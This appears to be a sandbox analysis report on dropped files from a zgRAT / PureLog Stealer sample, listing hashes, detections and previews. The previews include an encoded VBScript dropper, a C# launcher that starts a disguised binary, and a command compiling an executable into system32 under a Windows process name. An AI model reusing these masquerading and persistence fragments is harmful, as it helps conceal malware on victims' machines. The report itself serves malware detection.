                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Blockcomcrt\WmiPrvSE.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Blockcomcrt\WmiPrvSE.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (878), with no line terminators
                                    Category:dropped
                                    Size (bytes):878
                                    Entropy (8bit):5.883637676410847
                                    Encrypted:false
                                    SSDEEP:24:M9NVrvaBdtaujQ/siNYKerMVd+uPasKd8e84ag:M1raBvu/bWMVjDOpPag
                                    MD5:2624F8ABC2D12D51CE111D8E3D6DCB6F
                                    SHA1:D4483E691C09B6C7604FC46937B2DD36D6159A2A
                                    SHA-256:979917C69DFCFF970A39D72D90F3A0DD7C7EC027A4EB8B2F3B072465405E7DF7
                                    SHA-512:A2DE6E751FED1B45D14708B05E973218422B7E3844BA8600146589651266CD32618AD4E31C481AA9DD291216636FE49AF92E6A864378B910778B14A5B64AB2F8
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\Internal.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):91
                                    Entropy (8bit):5.327749827173924
                                    Encrypted:false
                                    SSDEEP:3:5hc0SPGwu5cz6AidRIFpT0KkCAZ4RKb4GpJkidIA:/SGg+AiLI/fkCAZYGpqidIA
                                    MD5:BA1F17D08022238C03A0F99FB13FFBDB
                                    SHA1:B37DA583926A1786B867C0A3136D8BDBA76820E9
                                    SHA-256:3E51E81E8759E98D54C199A7FF2A8F3C9E66B1AC29DC47CFAB94E8B2CC4469B8
                                    SHA-512:7D563872B45984D96B9AD74EE15B4EB64418C70BC72EABE8F916D908E2122C7BFF5F66948EC7E58E9BAF2E4C71E8C3592139F121575AE080A6CC029F2FD865C1
                                    Malicious:false
                                    Preview:%yDApQwjcHqqien%%FyVNXSf%..%jGLxVGWfTOoa%"C:\Blockcomcrt/AgentMonitor.exe"%liLlpkYVaQOZJUm%
                                    Process:C:\Users\user\Desktop\Internal.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):233
                                    Entropy (8bit):5.885990830988985
                                    Encrypted:false
                                    SSDEEP:6:GlwqK+NkLzWbH1rFnBaORbM5nCKvQSmy5Ru+iIaHs:GoMCzWL1hBaORbQCq9mfeD
                                    MD5:608C11DD9C227C9EA2D097F4D8ACECAA
                                    SHA1:B4ACA298525E851D4756A8197814B3F8FDC118E5
                                    SHA-256:7F2D511CCA49EA0F685E044AB7D26E62A265B6D698F2F4A32B97B20AB4D4962A
                                    SHA-512:717AF874245ECEEE21F71024F10F43DEE7A9F77FA984AEC14D62591E90E20585694454D97C88171A9D1F42F5F19C7C8C1F48E31201E1BEE4C4AA85656AA8474B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:#@~^0AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v 0!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z$^W13mK:1.YJzU?`&5}nhWMs&.NAWXijOyDnCGCB^X.48r67A!3bpKO{c4CYrS,!S,0mV/.RUIAAA==^#~@.
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (592), with no line terminators
                                    Category:dropped
                                    Size (bytes):592
                                    Entropy (8bit):5.896743836227658
                                    Encrypted:false
                                    SSDEEP:12:2pzCZHRyIPkY8NkDNAU3sDb/TOciDYhbSFWJOy9HlIXtSwcpD+/:2SRyIsY8NkDNWb/T04bJJOy9zv9+/
                                    MD5:3E1E8EFDF180585392E9ADDDFF72292A
                                    SHA1:5A75DD9F54A81AB52817E9BDDE6D0575090EC9A8
                                    SHA-256:6ABD0CB30D5C0F6EB1E26C7A8065F9E8DEDAEB3DC2D2AC899BD4B369314BE4DB
                                    SHA-512:443BA639CE13F581A6229E87605F55C6B3304430EFEA37518989E30FD72EAC62132C5845675205ACA8D569A23E4DAFE7ADEB2790AABFD6DCD8950FE85E8AE5E5
                                    Malicious:false
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):1168
                                    Entropy (8bit):4.448520842480604
                                    Encrypted:false
                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                    Malicious:false
                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):4608
                                    Entropy (8bit):3.931642084593758
                                    Encrypted:false
                                    SSDEEP:48:65mhtgWxZ8RxeOAkFJOcV4MKe28dMdfJ3evqBH7uulB+hnqXSfbNtm:BCXxvxVx9+evktTkZzNt
                                    MD5:AD24EFD4AC1D16536658DE1845095A45
                                    SHA1:B1EF0C4B5FD6BA3484B9CC3F71C56D9416303455
                                    SHA-256:4B41F4F088752B151B9E0EA5D62C70D36E094F6E4E80D9A1EE101B8D9763426A
                                    SHA-512:A9D4BF77ABA6F977B59C8089B2841C042091E8EB63DABF298CB4387A8D02AEC570627A9B554E4A59F13F07370C5E5D7FB5067A654C988F51F318EA0F92E29475
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iG.f.............................'... ...@....@.. ....................................@.................................p'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..H.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID...(... ...#Blob...........WU........%3................................................................
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (515), with no line terminators
                                    Category:dropped
                                    Size (bytes):515
                                    Entropy (8bit):5.866626211578882
                                    Encrypted:false
                                    SSDEEP:12:1wrpPWXmnoDGXZ53e6H3vb1iKHjKDCONiYkxf49AQtLUn0QTvDklUx:Kp+X0OoJHc2jDf49in0KDkl2
                                    MD5:97FE3F1FED9B755749DC7946DB4FF496
                                    SHA1:B7EC04E3A875E120A4C5EFA967D52401B847FB5D
                                    SHA-256:D6AA658092F76F88A8CFE55A25AA0A15BE54EE802C09A7A0B2D811026FEB8CE5
                                    SHA-512:42FD34CBCB1B034D5C8A6D53C6AC32CE040E7B98270117E4AAA5E0B707379EAFD84446EB88ADC3529B0AB1C556D265CC3B160E5D147F32207AA733F186FB452E
                                    Malicious:false
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (553), with no line terminators
                                    Category:dropped
                                    Size (bytes):553
                                    Entropy (8bit):5.866003942864501
                                    Encrypted:false
                                    SSDEEP:12:BovjOstPxLf4Zsuz6UW4OYHe3DJQqIJ6rOt5Ek:BYvTLGrKOeVcEat5Ek
                                    MD5:5A25F9E027282FE97F63AD3F924B2A4D
                                    SHA1:D02D418D7D5486B79463CC237594BE126474C9B9
                                    SHA-256:D088EEDD1C6FE1131914C9CD3D4A66EACAD52E0EDA07E3521EB4790EF2A5892F
                                    SHA-512:75F111679D04F9D36191E5DD8EB1EA1D1E346650F9DF35658C39D626163298A1E99BE9BC9F69AE839A252F42510E51E2C257A9244B1E98EC804CDC4F77856D7A
                                    Malicious:false
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\csrss.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\csrss.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (715), with no line terminators
                                    Category:dropped
                                    Size (bytes):715
                                    Entropy (8bit):5.877744765668358
                                    Encrypted:false
                                    SSDEEP:12:d3PhrUe/2w/wKg8JIrvI8Qe4szEklJdktSlhZGjv8Pzuucdmvhj0:9N2QwZsIr4zedm8zbcwJj0
                                    MD5:1E382BCF353384188D8A20DE5B95B3BA
                                    SHA1:5AA5C7E183B84BB4CE64507F74ABB939D2C5BFA6
                                    SHA-256:84F47284F4974FFA09F66DCFF285F43E583B69FBE4120B17E2F1006FC4C07BC4
                                    SHA-512:1F2672B06DF152EF441062BE0F3A69E7A804217ADF11A759901F5F751A8008377CC92A124FD5154EC8EAD0B2FB7028368733BD933E0C1A9CCEF6F73FDBEAA67B
                                    Malicious:false
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1396
                                    Entropy (8bit):5.350961817021757
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                    Process:C:\Blockcomcrt\WmiPrvSE.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.354334472896228
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                    Process:C:\Recovery\csrss.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.354334472896228
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.354334472896228
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):114688
                                    Entropy (8bit):0.9746603542602881
                                    Encrypted:false
                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                    Malicious:false
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):405
                                    Entropy (8bit):5.025175847603846
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LCYgG9VNiFkD:JNVQIbSfhV7TiFkMSfhWLCyVEFkD
                                    MD5:E518811F8D3B3207726EE0A60EA021AE
                                    SHA1:39B44FD057348FC516E74953A8B298096CE5250F
                                    SHA-256:3AA8B92E82D9673B1210E5D1E075B2E7D12E62E6090F14EDBA22CDF0D2AEF01A
                                    SHA-512:165181D92CFEDAC86E69D1ECD9FF8619067377AB6D7DA21505FCE9BDAC97077F4047178BECCC0CA1AF7FADB471A963CCF80F1ED56029718F210848C480A7D880
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"); } catch { } }).Start();. }.}.
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):251
                                    Entropy (8bit):5.084952486494227
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oCHhJ23fM61DOMn:Hu7L//TRq79cQD0knn
                                    MD5:661067CBC862045A8EEE7B13AC8146C6
                                    SHA1:04AACE9BD761BAB6F444CBBD0DB79D7C38B91F32
                                    SHA-256:4D4D8074B61B3BC31CFF915877589B1039C68C58DC6B49E1366435820B8D0CE6
                                    SHA-512:962201F53834603994B00B92D4EE8A86CA52EAC5BDFD1C84064C2256D44B3AF2C6945D4205C7347346678214FC4DCC09DFD8B52003EFB0B2D073BC97C6678A58
                                    Malicious:false
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.0.cs"
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (322), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):743
                                    Entropy (8bit):5.268539329768409
                                    Encrypted:false
                                    SSDEEP:12:T0I/u7L//TRq79cQD0knuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AI/un/Vq79tDGKax5DqBVKVrdFAMBJTH
                                    MD5:8A25815B905A5B9106669567BD8B7B8B
                                    SHA1:9991CCDB00D4F5023C9303FB2F053BC7EB678E39
                                    SHA-256:24A0766E92067D675A572DCB0C5E824F1B9590DBF99D91DE107BA214012BF5A6
                                    SHA-512:DF77803672A105054B5B3105E535B32CEE99AE55959F168B20F382CFD64E1687BB5D26663349CF2FAA8CA9FF27A6932AE1CB7894332CB365D94B72BBC67ED9D5
                                    Malicious:false
                                    Preview:.C:\Blockcomcrt> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):0.08235737944063153
                                    Encrypted:false
                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
